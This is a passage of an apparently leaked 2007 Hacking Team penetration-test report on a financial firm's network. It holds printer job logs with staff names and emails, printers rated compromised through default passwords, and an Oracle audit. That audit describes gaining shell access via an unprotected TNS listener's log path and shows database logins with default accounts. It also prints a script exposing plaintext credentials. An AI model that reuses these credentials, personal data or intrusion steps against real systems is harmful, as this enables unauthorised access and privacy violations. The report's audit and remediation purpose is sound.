EUREX_Memorandum_Nominated_Pe","CMalerba",,13/07 2007 08:57:42,13/07 2007 09:01:33,"2","16","2 X 5296,"OK","3.
EUREX_Application_Nominated_P","CMalerba",,13/07 2007 08:57:31,13/07 2007 09:01:05,"1","8","1 X
5295,"OK","Microsoft Word - 3. Eurex - regi","CMalerba",,13/07 2007 08:57:16,13/07 2007 09:00:54,"1","8","1 X
5294,"OK","2. FSA Form A.pdf","CMalerba",,13/07 2007 08:56:58,13/07 2007 09:00:33,"18","144","18 X
5293,"OK","Microsoft Word - 2. Executive Su","CMalerba",,13/07 2007 08:56:28,13/07 2007 08:57:12,"3","24","3 X
5292,"OK","Microsoft Word - 1. FSA Requirem","CMalerba",,13/07 2007 08:56:04,13/07 2007 08:56:41,"2","16","2 X
5291,"OK","Microsoft Word - EUROMTS BOARD A","CMalerba",,13/07 2007 08:54:55,13/07 2007 08:55:44,"2","20","1 X
5290,"OK","Microsoft PowerPoint - MTS Group","BSimpkins",,12/07 2007 18:35:05,12/07 2007 5289,"OK","Microsoft
PowerPoint - 070709 MT","BSimpkins",,12/07 2007 16:12:02,12/07 2007 16:13:02,"31","31","31 X 1","","","OK"
5288,"OK","Item 7. b) TPA- Report to the Su","CMalerba",,12/07 2007 15:11:45,12/07 2007 5287,"OK","Microsoft
PowerPoint - MTS Group","BSimpkins",,12/07 2007 14:15:38,12/07 2007 14:16:39,"30","30","30 X 1","","","OK"
5286,"OK","Microsoft Word - 070711 Einladun","FCampanella",,12/07 2007 10:56:06,12/07 2007 10:56:32,"2","6","2
5285,"OK","","",,11/07 2007 09:25:36,11/07 2007 09:25:57,"3","3","3 X 1","","","OK"
5284,"OK","","",,11/07 2007 09:14:31,11/07 2007 09:14:54,"3","3","3 X 1","","","OK"
5283,"OK","","",,10/07 2007 12:01:54,10/07 2007 12:02:16,"4","4","1 X 4","","","OK"
5282,"OK","","",,10/07 2007 11:57:39,10/07 2007 11:58:02,"4","4","1 X 4","","","OK"
5281,"OK","Microsoft PowerPoint - 070705 MT","BSimpkins",,06/07 2007 16:06:23,06/07 2007
5280,"OK","https://www.ups.com/uis/create?A","CMalerba",,06/07 2007 15:54:04,06/07 2007 15:54:24,"2","2","2 X
5279,"OK","Microsoft Word - Annex 01 - MTS ","BSimpkins",,26/06 2007 16:06:11,26/06 2007 16:06:39,"8","8","8 X
5278,"OK","Item 2 - Relazione Consiglio di ","FCampanella",,26/06 2007 12:07:27,26/06 2007
5277,"OK","BARRERA.MTS_656487.pdf","BSimpkins",,26/06 2007 11:35:02,26/06 2007 11:35:23,"1","1","1 X
5276,"OK","BARRERA.MTS_656442.pdf","BSimpkins",,26/06 2007 11:32:30,26/06 2007 11:33:52,"12","12","12 X
5275,"OK","Item 3 - Nomina società di rev","FCampanella",,26/06 2007 11:23:30,26/06 2007 5274,"OK","Item 3 -
Nomina società di rev","FCampanella",,26/06 2007 11:23:02,26/06 2007 11:30:35,"1","10","1 X 10","","","OK"
5273,"OK","Item 1 - Approvazione del bilanc","FCampanella",,26/06 2007 11:22:33,26/06 2007 5272,"OK","Item 1 -
Approvazione del bilanc","FCampanella",,26/06 2007 11:21:45,26/06 2007 11:30:09,"1","10","1 X 10","","","OK"
5271,"OK","Item 3 - Comunicazione Deloitte.","FCampanella",,26/06 2007 11:21:11,26/06 2007
5270,"OK","Item 3 - Communication by Deloit","FCampanella",,26/06 2007 11:20:29,26/06 2007
5269,"OK","Item 2 - Relazione Consiglio di ","FCampanella",,26/06 2007 11:19:25,26/06 2007 11:19:59,"3","3","3
5268,"OK","Item 2 - Annual Report to Genera","FCampanella",,26/06 2007 11:18:52,26/06 2007
5267,"OK","Avv_Conv_Ass_28_giugno_ 2007_ITA","FCampanella",,26/06 2007 11:18:21,26/06 2007
5266,"OK","Avv_Conv_Ass_28_giugno_2007_ENG.","FCampanella",,26/06 2007 11:17:40,26/06 2007
5265,"OK","Report Seconda Pensione.pdf","FCampanella",,26/06 2007 10:45:12,26/06 2007 10:46:09,"8","8","8 X
5264,"OK","2007 Global Holiday Plan.xls","FCampanella",,25/06 2007 14:57:36,25/06 2007 14:57:57,"2","2","2 X
5263,"OK","2007 Global Holiday Plan.xls","FCampanella",,25/06 2007 14:56:51,25/06 2007 14:57:13,"2","2","2 X
5262,"OK","http://www.borsaitaliana.it/chis","BSimpkins",,25/06 2007 12:12:19,25/06 2007
5261,"OK","BARRERA.MTS_655624.pdf","BSimpkins",,25/06 2007 10:23:05,25/06 2007 10:26:25,"12","12","12 X
5260,"OK","BARRERA.MTS_655587.pdf","BSimpkins",,25/06 2007 10:22:44,25/06 2007 10:25:14,"14","14","14 X
5259,"OK","BARRERA.MTS_655554.pdf","BSimpkins",,25/06 2007 10:22:22,25/06 2007 10:23:52,"13","13","13 X
5258,"OK","MTS_200607.pdf","BSimpkins",,21/06 2007 09:31:59,21/06 2007 09:32:34,"2","2","2 X 1","","","OK"
5257,"OK","BARRERA.MTS_653587.pdf","BSimpkins",,21/06 2007 09:31:44,21/06 2007 09:32:31,"7","7","7 X
5256,"OK","Microsoft Word - MESSA 24 GIUGNO","ABattaglia",,19/06 2007 19:01:43,19/06 2007 19:02:23,"6","6","4
5255,"OK","Microsoft Word - MESSA 24 GIUGNO","ABattaglia",,19/06 2007 18:56:51,19/06 2007 18:57:14,"4","4","2
5254,"OK","Microsoft Word - MESSA 24 GIUGNO","ABattaglia",,19/06 2007 18:54:23,19/06 2007 18:54:47,"4","4","2
5253,"OK","regolamento.pdf","BSimpkins",,19/06 2007 15:59:45,19/06 2007 16:00:57,"42","42","42 X 1","","","OK"
5252,"OK","2007 Global Holiday Plan.xls","FCampanella",,19/06 2007 10:46:56,19/06 2007 10:47:21,"3","3","3 X
5251,"OK","Bar - Management.xls","CMalerba",,18/06 2007 17:02:12,18/06 2007 17:02:28,"1","1","1 X
5250,"OK","Item 4 - ATKearney Presentation.","FCampanella",,18/06 2007 16:24:22,18/06 2007
5249,"OK","Microsoft PowerPoint - Item 8 - ","FCampanella",,18/06 2007 16:23:24,18/06 2007
© 2007 Hacking TeamAll rights reserved
Number of attachments: 0 Page 340 of 460
All rights reserved. It's explicitly fordbidden to copy, distribute, publish, reuse even in part articles, texts, workflows, images contained in this document without a written permission from the company Hacking Team S.r.l., except for the possibility to use this material for internal use of the company with respect to the underwritten contract.
5248,"OK","Item 7- Certificate from the Min","FCampanella",,18/06 2007 16:22:35,18/06 2007
5247,"OK","Item 7 - Declaration.Willcox.ITA","FCampanella",,18/06 2007 16:14:19,18/06 2007
5246,"OK","Item 7 - Declaration.Willcox.ENG","FCampanella",,18/06 2007 16:13:28,18/06 2007
5245,"OK","Item 7 - Declaration.Systermans.","FCampanella",,18/06 2007 16:12:51,18/06 2007
5244,"OK","Item 7- Declaration.Systermans.E","FCampanella",,18/06 2007 16:11:54,18/06 2007
5243,"OK","Item 6 - 07 05 17_TC Minutes.pdf","FCampanella",,18/06 2007 16:11:14,18/06 2007
5242,"OK","Item 6 - 07 05 17 Tech Committee","FCampanella",,18/06 2007 16:10:09,18/06 2007
5241,"OK","Item 4 - Letter to Bank of Italy","FCampanella",,18/06 2007 16:09:28,18/06 2007
5240,"OK","Item 4 - Letter to Bank of Italy","FCampanella",,18/06 2007 16:08:51,18/06 2007
5239,"OK","Item 3- Minutes MB 29 May 2007 -","FCampanella",,18/06 2007 16:07:46,18/06 2007
5238,"OK","Item 3- Minutes MB 29 May 2007 -","FCampanella",,18/06 2007 16:06:56,18/06 2007
5237,"OK","MTS - Notice_of_call_Management_","FCampanella",,18/06 2007 16:05:03,18/06 2007
5236,"OK","8102-2007-06-14-ditta.pdf","BSimpkins",,14/06 2007 10:06:02,14/06 2007 10:07:36,"57","57","57 X
5235,"OK","8102-2007-06-14-riep-ced.pdf","BSimpkins",,14/06 2007 10:05:34,14/06 2007 10:05:53,"1","1","1 X
5234,"OK","Section 2 - TO GO IN FILE.pdf","BSimpkins",,13/06 2007 10:23:15,13/06 2007 10:23:37,"4","4","4 X
5233,"OK","Section 2 - TO GO IN FILE.pdf","BSimpkins",,13/06 2007 10:20:59,13/06 2007 10:21:56,"27","27","27 X
5232,"OK","TFR1.pdf","PBizzoca",,12/06 2007 13:34:49,12/06 2007 13:35:07,"1","1","1 X 1","","","OK"
5231,"OK","EMF wkbk proof 110607.pdf","PBizzoca",,12/06 2007 11:10:05,12/06 2007 11:12:34,"21","21","21 X
5230,"OK","EMF wkbk proof 110607.pdf","PBizzoca",,12/06 2007 11:06:39,12/06 2007 11:09:11,"21","21","21 X
5229,"OK","Test Page","PBizzoca",,12/06 2007 11:05:17,12/06 2007 11:05:35,"1","1","1 X 1","","","OK"
5228,"OK","outbind://19-000000000908982599C","PBizzoca",,12/06 2007 11:02:03,12/06 2007 11:02:17,"1","1","1 X
5227,"OK","outbind://19-000000000908982599C","PBizzoca",,12/06 2007 11:01:34,12/06 2007 11:01:53,"1","1","1 X
5226,"OK","outbind://40-00000000BF52D9C5389","CMalerba",,12/06 2007 10:02:30,12/06 2007 10:02:49,"2","2","2 X
5225,"OK","Section 2 - TO GO IN FILE.pdf","CMalerba",,12/06 2007 09:20:09,12/06 2007 09:21:03,"27","27","27 X
5224,"OK","Letter_Grievance_PhR_MTS_S.p.A_1","BSimpkins",,11/06 2007 16:19:51,11/06 2007 16:20:20,"5","5","5 X
5223,"OK","Data_Subject_Access_request.pdf","BSimpkins",,11/06 2007 16:19:32,11/06 2007 16:19:51,"2","2","2 X
5222,"OK","scanBridget.pdf","BSimpkins",,11/06 2007 16:07:38,11/06 2007 16:08:46,"8","8","8 X 1","","","OK"
5221,"OK","Microsoft Word - FM_grievance_le","BSimpkins",,11/06 2007 16:07:13,11/06 2007 16:07:28,"5","5","5 X
5220,"OK","Microsoft Word - Data Subject Ac","BSimpkins",,11/06 2007 16:06:57,11/06 2007 16:07:17,"2","2","2 X
5219,"OK","Section 2 - TO GO IN FILE.pdf","BSimpkins",,08/06 2007 16:41:30,08/06 2007 16:42:21,"26","26","26 X
5218,"OK","Microsoft Word - Item 5 _a_ - MA","FCampanella",,06/06 2007 11:09:08,06/06 2007
5217,"OK","Item 4 - EuroMTS DR Test Results","FCampanella",,06/06 2007 11:08:40,06/06 2007
5216,"OK","Microsoft Word - Item 3 - CEO Co","FCampanella",,06/06 2007 11:07:48,06/06 2007
5215,"OK","Microsoft Word - Agenda for 7 Ju","FCampanella",,06/06 2007 11:00:26,06/06 2007
5214,"OK","Microsoft PowerPoint - MTS Group","BSimpkins",,31/05 2007 14:30:58,31/05 2007
5213,"OK","Microsoft Word - MTS Employee Ha","BSimpkins",,31/05 2007 14:30:03,31/05 2007
5212,"OK","Microsoft Word - EMTS Emp HandBo","BSimpkins",,31/05 2007 10:21:02,31/05 2007
5211,"OK","Microsoft Photo Editor - DSC0045","BSimpkins",,30/05 2007 14:36:59,30/05 2007 14:37:26,"1","1","1 X
5210,"OK","burnout.pdf","FPozzi",,29/05 2007 11:07:40,29/05 2007 11:08:37,"28","28","14 X 1","","","OK"
5209,"OK","fax_cover_mts.pdf","BSimpkins",,29/05 2007 10:30:03,29/05 2007 10:30:54,"1","25","1 X
5208,"OK","soggetti coinvolti.pdf","BSimpkins",,28/05 2007 14:49:26,28/05 2007 14:49:44,"4","4","4 X
HTTP/1.1 200 OK
Date: SUN, 14 JUL 2007 23:00:48 GMT
Server: CANON HTTP Server Ver2.21
Content-Type: application/octet-stream
Content-disposition: attachment
Transfer-Encoding: chunked
"N. lavoro (Rif. n. lavoro)","Risultato","Tipo lavoro","Destinazione","Utente","ID divisione","Modo","Ora
inizio","Ora fine","Invio pagine","Dimensione file da inviare (K Byte)","Nome documento da inviare","Codice
8,"--","E-mail","[email protected]","",,"",11/05 2007 16:39:42,11/05 2007 16:39:45,1,208,"","#899"
7,"NG","E-mail","[email protected]","",,"",11/05 2007 16:37:41,11/05 2007 16:37:42,0,0,"","#806"
6,"--","E-mail","[email protected]","",,"",11/05 2007 16:36:16,11/05 2007 16:36:22,2,411,"","#899"
5,"NG","Fax","00280235200","lmeneghesso",," ",29/03 2007 16:33:25,29/03 2007 16:33:35,0,0,"","STOP"
4,"--","E-mail","[email protected]","",,"",29/03 2007 15:38:32,29/03 2007 15:38:35,1,204,"","#899"
© 2007 Hacking TeamAll rights reserved
Number of attachments: 0 Page 341 of 460
All rights reserved. It's explicitly fordbidden to copy, distribute, publish, reuse even in part articles, texts, workflows, images contained in this document without a written permission from the company Hacking Team S.r.l., except for the possibility to use this material for internal use of the company with respect to the underwritten contract.
3,"NG","E-mail","[email protected]","",,"",29/03 2007 15:35:31,29/03 2007 15:35:31,0,0,"","#806"
2,"--","E-mail","[email protected]","",,"",29/03 2007 15:32:41,29/03 2007 15:32:43,1,203,"","#899"
1,"--","E-mail","[email protected]","",,"",29/03 2007 15:28:09,29/03 2007 15:28:09,1,4,"","#899"
6.18.15 100.100.200.253 [Compromised]
Rating: compromised
Vulnerabilities found: V2, V6
Risk state: medium
Skill level required to exploit the vulnerability: Low
Solution: Change default passwords; replace telnet access with SSH if available
Discovery method ICMP Echo Ping on Initial scan
Availability Mostly alive (Embedded/Server/Workstation)
Class Printer
Vendor/OS Ricoh Version Alficio 3235C
Hostname RNPAEF589
Compromised Direclty Compromised Info Weak password
Auth telnet://admin:(NULL)@100.100.200.253/
The host was alive and these additional information could be extracted:
21/tcp open ftp Ricoh Aficio 3235C printer ftpd 4.17
23/tcp open telnet?
80/tcp open http Ricoh Afficio printer web image monitor (Web-Server
httpd 3.0)
139/tcp open tcpwrapped
514/tcp open login Aficio/NRG printer logind
515/tcp open printer lpd (error: Illegal service request)
631/tcp open ipp?
9100/tcp open jetdirect?
Uptime: 66.620 days (since Tue May 8 19:30:11 2007)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=215 (Good luck!)
IPID Sequence Generation: Incremental
Service Info: Device: printer
Telnetd is an insecure service, use SSH v2 or at last telnet-ssl. Disable the service if not needed.
It was possible to login in the administration using telnet by tying a default password set.© 2007 Hacking Team
All rights reservedNumber of attachments: 0 Page 342 of 460
All rights reserved. It's explicitly fordbidden to copy, distribute, publish, reuse even in part articles, texts, workflows, images contained in this document without a written permission from the company Hacking Team S.r.l., except for the possibility to use this material for internal use of the company with respect to the underwritten contract.
6.18.16 100.100.200.46 [Safe]
Rating: safe
Vulnerabilities found: n/a
Risk state: n/a
Skill level required to exploit the vulnerability: n/a
Solution: n/a
Discovery method ICMP Echo Ping on Initial scan
Availability Mostly alive (Embedded/Server/Workstation)
Class Printer
Vendor/OS Hewlett-Packard Version LaserJet 4345
Hostname Not detected
Compromised No Info None
Auth Not detected
The host was alive and these additional information could be extracted:
21/tcp open ftp HP JetDirect ftpd
80/tcp open http?
280/tcp open http-mgmt?
443/tcp open ssl/http hp color LaserJet 4650 (HP-ChaiSOE 1.0)
515/tcp open printer
631/tcp open ipp?
9100/tcp open jetdirect?
Uptime: 21.667 days (since Fri Jun 22 17:07:53 2007)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=28 (Good luck!)
IPID Sequence Generation: Incremental
Service Info: Devices: print server, printer
6.19 Printers in Network 100.100.100.0/24
© 2007 Hacking TeamAll rights reserved
Number of attachments: 0 Page 343 of 460
All rights reserved. It's explicitly fordbidden to copy, distribute, publish, reuse even in part articles, texts, workflows, images contained in this document without a written permission from the company Hacking Team S.r.l., except for the possibility to use this material for internal use of the company with respect to the underwritten contract.
6.19.1 100.100.100.102 [Compromised]
Rating: compromised
Vulnerabilities found: V2
Risk state: medium
Skill level required to exploit the vulnerability: Low
Solution: Change default passwords
Discovery method ICMP Echo Ping on Initial scan
Availability Mostly alive (Embedded/Server/Workstation)
Class Printer
Vendor/OS Xerox Version DC_250 Fiery WebTools
Hostname Not detected
Compromised Compromised directly Info User access
Auth Not needed
The host was alive and these additional information could be extracted:
21/tcp open tcpwrapped
80/tcp open http Apache httpd
443/tcp open ssl/http Apache httpd
515/tcp open printer
631/tcp open http Apache httpd
8021/tcp open ftp-proxy?
Uptime: 24.353 days (since Mon Jul 2 14:10:50 2007)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=203 (Good luck!)
IPID Sequence Generation: All zeros
It's possible to get user access without specifying any password, this lead to DoS and Information
Disclosure.
6.19.2 100.100.100.148 [Compromised]
Rating: compromised
Vulnerabilities found: V2, V6
Risk state: medium
Skill level required to exploit the vulnerability: Low
© 2007 Hacking TeamAll rights reserved
Number of attachments: 0 Page 344 of 460
All rights reserved. It's explicitly fordbidden to copy, distribute, publish, reuse even in part articles, texts, workflows, images contained in this document without a written permission from the company Hacking Team S.r.l., except for the possibility to use this material for internal use of the company with respect to the underwritten contract.
Solution: Change default passwords; replace telnet access with SSH if available
Discovery method ICMP Echo Ping on Initial scan
Availability Mostly alive (Embedded/Server/Workstation)
Class Printer
Vendor/OS Hewlett-Packard Version LaserJet 2200
Hostname Not detected
Compromised Compromised directly Info Admin no authentication
Auth Not necessary
The host was alive and these additional information could be extracted:
21/tcp open ftp HP JetDirect ftpd
23/tcp open telnet HP JetDirect printer telnetd (No password)
80/tcp open http-mgmt HP LaserJet (Embedded webserver: Agranat-EmWeb 5.2.6)
280/tcp open http-mgmt HP LaserJet (Embedded webserver: Agranat-EmWeb 5.2.6)
515/tcp open printer
631/tcp open http-mgmt HP LaserJet (Embedded webserver: Agranat-EmWeb 5.2.6)
9100/tcp open jetdirect?
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=25 (Good luck!)
IPID Sequence Generation: Incremental
Service Info: Devices: print server, printer
Telnetd is an insecure service, use SSH v2 or at last telnet-ssl. Disable the service if not needed.
It's possible to get admin access without specifying any password, this lead to DoS and
Information Disclosure.
6.19.3 100.100.100.149 [Compromised]
Rating: compromised
Vulnerabilities found: V2, V6
Risk state: medium
Skill level required to exploit the vulnerability: Low
Solution: Change default passwords; replace telnet access with SSH if available
Discovery method ICMP Echo Ping on Initial scan
Availability Mostly alive (Embedded/Server/Workstation)
© 2007 Hacking TeamAll rights reserved
Number of attachments: 0 Page 345 of 460
All rights reserved. It's explicitly fordbidden to copy, distribute, publish, reuse even in part articles, texts, workflows, images contained in this document without a written permission from the company Hacking Team S.r.l., except for the possibility to use this material for internal use of the company with respect to the underwritten contract.
Class Printer
Vendor/OS Hewlett-Packard Version LaserJet 2200
Hostname Not detected
Compromised Compromised directly Info Admin no authentication
Auth Not necessary
The host was alive and these additional information could be extracted:
21/tcp open ftp HP JetDirect ftpd
23/tcp open telnet HP JetDirect printer telnetd (No password)
80/tcp open http-mgmt HP LaserJet (Embedded webserver: Agranat-EmWeb 5.2.6)
280/tcp open http-mgmt HP LaserJet (Embedded webserver: Agranat-EmWeb 5.2.6)
515/tcp open printer
631/tcp open http-mgmt HP LaserJet (Embedded webserver: Agranat-EmWeb 5.2.6)
9100/tcp open jetdirect?
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=25 (Good luck!)
IPID Sequence Generation: Incremental
Service Info: Devices: print server, printer
Telnetd is an insecure service, use SSH v2 or at last telnet-ssl. Disable the service if not needed.
It's possible to get admin access without specifying any password, this lead to DoS and
Information Disclosure.
6.19.4 100.100.100.151 [Compromised]
Rating: compromised
Vulnerabilities found: V2
Risk state: medium
Skill level required to exploit the vulnerability: Low
Solution: Change default passwords
Discovery method ICMP Echo Ping on Initial scan
Availability Mostly alive (Embedded/Server/Workstation)
Class Printer
© 2007 Hacking TeamAll rights reserved
Number of attachments: 0 Page 346 of 460
All rights reserved. It's explicitly fordbidden to copy, distribute, publish, reuse even in part articles, texts, workflows, images contained in this document without a written permission from the company Hacking Team S.r.l., except for the possibility to use this material for internal use of the company with respect to the underwritten contract.
Vendor/OS Xerox Version DC_250 Fiery WebTools
Hostname Not detected
Compromised Compromised directly Info User access
Auth Not necessary
The host was alive and these additional information could be extracted:
21/tcp open ftp
80/tcp open http Apache httpd
139/tcp open netbios-ssn Samba smbd (workgroup: dWORKGROUP)
443/tcp open ssl/http Apache httpd
515/tcp open printer
631/tcp open http Apache httpd
8021/tcp open ftp-proxy?
Uptime: 24.359 days (since Mon Jul 2 14:10:50 2007)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=200 (Good luck!)
IPID Sequence Generation: All zeros
It's possible to get admin access without specifying any password, this lead to DoS and
Information Disclosure.
6.19.5 100.100.100.251 [Compromised]
Rating: compromised
Vulnerabilities found: V2
Risk state: medium
Skill level required to exploit the vulnerability: Low
Solution: Change default passwords
Discovery method ICMP Echo Ping on Initial scan
Availability Mostly alive (Embedded/Server/Workstation)
Class Printer
Vendor/OS Xerox Version DC_250 Fiery WebTools
Hostname Not detected
Compromised Compromised directly Info User/Admin access
Auth Not necessary
© 2007 Hacking TeamAll rights reserved
Number of attachments: 0 Page 347 of 460
All rights reserved. It's explicitly fordbidden to copy, distribute, publish, reuse even in part articles, texts, workflows, images contained in this document without a written permission from the company Hacking Team S.r.l., except for the possibility to use this material for internal use of the company with respect to the underwritten contract.
The host was alive and these additional information could be extracted:
21/tcp open ftp
80/tcp open http Apache httpd
139/tcp open netbios-ssn Samba smbd (workgroup: dWORKGROUP)
443/tcp open ssl/http Apache httpd
515/tcp open printer
631/tcp open http Apache httpd
8021/tcp open ftp-proxy?
Uptime: 11.359 days (since Fri Jul 13 5:55:50 2007)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=200 (Good luck!)
IPID Sequence Generation: All zeros
It's possible to get admin access without specifying any password, this lead to DoS and
Information Disclosure.
© 2007 Hacking TeamAll rights reserved
Number of attachments: 0 Page 348 of 460
All rights reserved. It's explicitly fordbidden to copy, distribute, publish, reuse even in part articles, texts, workflows, images contained in this document without a written permission from the company Hacking Team S.r.l., except for the possibility to use this material for internal use of the company with respect to the underwritten contract.
7 Oracle Auditing
7.1 Technical Summary
The Oracle Audit from MPLS on the specified networks evidenced 11 systems, 8 of them have
critical vulnerabilities that could lead to DoS, partial or complete compromise and Information
Disclosure.
Most of the Oracle systems found on the network were outdated and missing important patchsets.
An important security issue is the fact that each system analyzed was exposing access at least 30
default accounts, most of which with password equal to the username.
On some machines local access was already obitained via the reuse of VNC credential (ed***x).
Clear text configuration files were containing accounts and passwords of custom applications,
allowing complete insert/select/update/delete access on data records.
Almost all of the systems were exposing TSN Listeners with no password (security off) allowing
arbitrary files to be written to the disk by altering the log path. It was possible to create .rhost files
in the oracle user's home and gaining shell access.
Once the best accounts to conduct an attack were detected, using different public exploits, they
were used in order to gain DBA access. Password hashes were retrieved and in most cases they
were recovered to plaintext by bruteforce attacks.
A soft policy was chosen in this case to don't disrupt services in production, so we didn't attempt to
gain shell access on some particular machines but preferred to just show the techniques on less
important machines. The advice is to completely review the deployment of Oracle services by
checking default usernames and removing the unused ones, check for weak passwords, encrypt
configuration files for the applications, disable where possible TSN Listeners, turn “security on”,
implement firewalling to restrict access to specified IPs and upgrade or patch services to the latest
version.
7.1.1 100.100.200.5 [Compromised]
Rating: compromised
Vulnerabilities found: V2, V5, V7, V10
Risk state: high
© 2007 Hacking TeamAll rights reserved
Number of attachments: 0 Page 349 of 460
All rights reserved. It's explicitly fordbidden to copy, distribute, publish, reuse even in part articles, texts, workflows, images contained in this document without a written permission from the company Hacking Team S.r.l., except for the possibility to use this material for internal use of the company with respect to the underwritten contract.
Skill level required to exploit the vulnerability: Medium
Solution: Change all default passwords; update Oracle to the last version available or at least install all
required patches; enable security in TNS listener; encrypt sensitive data files
Discovery method Network scan
Availability Startup on boot
Class Application/Service
Vendor/OS Oracle Version 9.2.0.1.0 - 64bit
Compromised Compromised Directly Info Priv. Escalation to DBA
Auth Not detected
The database server is accessible by any host in the network. No firewall ACL is present.
It's possible to fetch the complete Oracle status by querying the TNS Listener.
Password less TNS Listener allow arbitrary file creation with the privileges of the user running the
Oracle database by altering the log path. Local access to the user rurring Oracle can be gained by
creating a .rhost file:
oracle@&ORCL:/export/home/oracle/util>lsnrctl
LSNRCTL for Solaris: Version 9.2.0.1.0 - Production on 02-SEP-2007 20:05:09
Copyright (c) 1991, 2002, Oracle Corporation. All rights reserved.
Welcome to LSNRCTL, type "help" for information.
LSNRCTL> set current_listener^[[D^[[D^[[C^H
NL-00853: undefined set command "current_listen". Try "help set"
LSNRCTL> set current_listener 127.0.0.1
Current Listener is 127.0.0.1
LSNRCTL> version
Connecting to
(DESCRIPTION=(CONNECT_DATA=(SID=*)(SERVICE_NAME=127.0.0.1))(ADDRESS=(PROTOCOL=TC
P)(HOST=127.0.0.1)(PORT=1521)))
TNSLSNR for Solaris: Version 9.2.0.1.0 - Production
TNS for Solaris: Version 9.2.0.1.0 - Production
Unix Domain Socket IPC NT Protocol Adaptor for Solaris: Version
9.2.0.1.0 - Production
Oracle Bequeath NT Protocol Adapter for Solaris: Version 9.2.0.1.0 -
Production
TCP/IP NT Protocol Adapter for Solaris: Version 9.2.0.1.0 - Production,,
The command completed successfully
LSNRCTL> services
© 2007 Hacking TeamAll rights reserved
Number of attachments: 0 Page 350 of 460
All rights reserved. It's explicitly fordbidden to copy, distribute, publish, reuse even in part articles, texts, workflows, images contained in this document without a written permission from the company Hacking Team S.r.l., except for the possibility to use this material for internal use of the company with respect to the underwritten contract.
Connecting to
(DESCRIPTION=(CONNECT_DATA=(SID=*)(SERVICE_NAME=127.0.0.1))(ADDRESS=(PROTOCOL=TC
P)(HOST=127.0.0.1)(PORT=1521)))
Services Summary...
Service "ORCL" has 2 instance(s).
Instance "ORCL", status UNKNOWN, has 1 handler(s) for this service...
Handler(s):
"DEDICATED" established:0 refused:0
LOCAL SERVER
Instance "ORCL", status READY, has 1 handler(s) for this service...
Handler(s):
"DEDICATED" established:1672 refused:0 state:ready
LOCAL SERVER
Service "PLSExtProc" has 1 instance(s).
Instance "PLSExtProc", status UNKNOWN, has 1 handler(s) for this service...
Handler(s):
"DEDICATED" established:0 refused:0
LOCAL SERVER
The command completed successfully
LSNRCTL> status
Connecting to
(DESCRIPTION=(CONNECT_DATA=(SID=*)(SERVICE_NAME=127.0.0.1))(ADDRESS=(PROTOCOL=TC
P)(HOST=127.0.0.1)(PORT=1521)))
STATUS of the LISTENER
------------------------
Alias LISTENER
Version TNSLSNR for Solaris: Version 9.2.0.1.0 - Production
Start Date 29-AUG-2007 20:41:09
Uptime 3 days 23 hr. 25 min. 57 sec
Trace Level off
Security OFF
SNMP OFF
Listener Parameter File /opt/oracle/product/9.2.0/network/admin/listener.ora
Listener Log File /opt/oracle/product/9.2.0/network/log/listener.log
Listening Endpoints Summary...
(DESCRIPTION=(ADDRESS=(PROTOCOL=tcp)(HOST=milsunats-ppf)(PORT=1521)))
(DESCRIPTION=(ADDRESS=(PROTOCOL=ipc)(KEY=EXTPROC)))
Services Summary...
Service "ORCL" has 2 instance(s).
© 2007 Hacking TeamAll rights reserved
Number of attachments: 0 Page 351 of 460
All rights reserved. It's explicitly fordbidden to copy, distribute, publish, reuse even in part articles, texts, workflows, images contained in this document without a written permission from the company Hacking Team S.r.l., except for the possibility to use this material for internal use of the company with respect to the underwritten contract.
Instance "ORCL", status UNKNOWN, has 1 handler(s) for this service...
Instance "ORCL", status READY, has 1 handler(s) for this service...
Service "PLSExtProc" has 1 instance(s).
Instance "PLSExtProc", status UNKNOWN, has 1 handler(s) for this service...
The command completed successfully
It was possible to access the database with a default username and password
(DBSNMP/DBSNMP):
Connected to:
Oracle9i Enterprise Edition Release 9.2.0.1.0 - 64bit Production
With the Partitioning option
JServer Release 9.2.0.1.0 - Production
SQL> show user;
USER is "DBSNMP"
SQL> select * from user_sys_privs;
USERNAME PRIVILEGE ADM
------------------------------ ---------------------------------------- ---
DBSNMP SELECT ANY DICTIONARY NO
oracle@&ORCL:/export/home/oracle/util>echo $ORACLE_SID
ORCL
oracle@&ORCL:/export/home/oracle/util>echo $ORACLE_HOME
/opt/oracle/product/9.2.0
It was possible to access the database with a default username and password (APPS/APPS):
oracle@&ORCL:/export/home/oracle/util>sqlplus -L APPS/APPS
SQL*Plus: Release 9.2.0.1.0 - Production on Mon Sep 3 00:33:10 2007
Copyright (c) 1982, 2002, Oracle Corporation. All rights reserved.
Error accessing PRODUCT_USER_PROFILE
Warning: Product user profile information not loaded!
You may need to run PUPBLD.SQL as SYSTEM
Connected to:
Oracle9i Enterprise Edition Release 9.2.0.1.0 - 64bit Production
With the Partitioning option
JServer Release 9.2.0.1.0 - Production
SQL>
SQL> select *
from user_role_privs
; 2 3 © 2007 Hacking Team
All rights reservedNumber of attachments: 0 Page 352 of 460
All rights reserved. It's explicitly fordbidden to copy, distribute, publish, reuse even in part articles, texts, workflows, images contained in this document without a written permission from the company Hacking Team S.r.l., except for the possibility to use this material for internal use of the company with respect to the underwritten contract.
USERNAME GRANTED_ROLE ADM DEF OS_
------------------------------ ------------------------------ --- --- ---
APPS CONNECT NO YES NO
APPS RESOURCE NO YES NO
SQL>
Multiple account and passwords were found in a custom local file:
oracle@&ORCL:/export/home/oracle/util>cat connect_db
#!/usr/bin/ksh
export username_adm=atsadmin
export password_adm=atsadmin
export username=market
export password=market
export usercmf=atscmf
export passcmf=newv3rs10n
export userswap=atsswap
export passswap=F1nal1y
export userbv=mtsnet
export passbv=mtsnet
export admins="[email protected]"
export ora_admins="[email protected]"
export
accounting="[email protected],[email protected],cazzulini_fabrizio@mtss
pa.it"
oracle@&ORCL:/export/home/oracle/util>find / 2>/dev/null | grep connect_db
/export/home/oracle/util/connect_db
It was possible to access the database with the custom usernames and passwords found in
previous file (atsadmin/atsadmin):
oracle@&ORCL:/export/home/oracle/util>sqlplus atsadmin/atsadmin
SQL*Plus: Release 9.2.0.1.0 - Production on Sun Sep 2 19:29:07 2007
Copyright (c) 1982, 2002, Oracle Corporation. All rights reserved.
Error accessing PRODUCT_USER_PROFILE
Warning: Product user profile information not loaded!
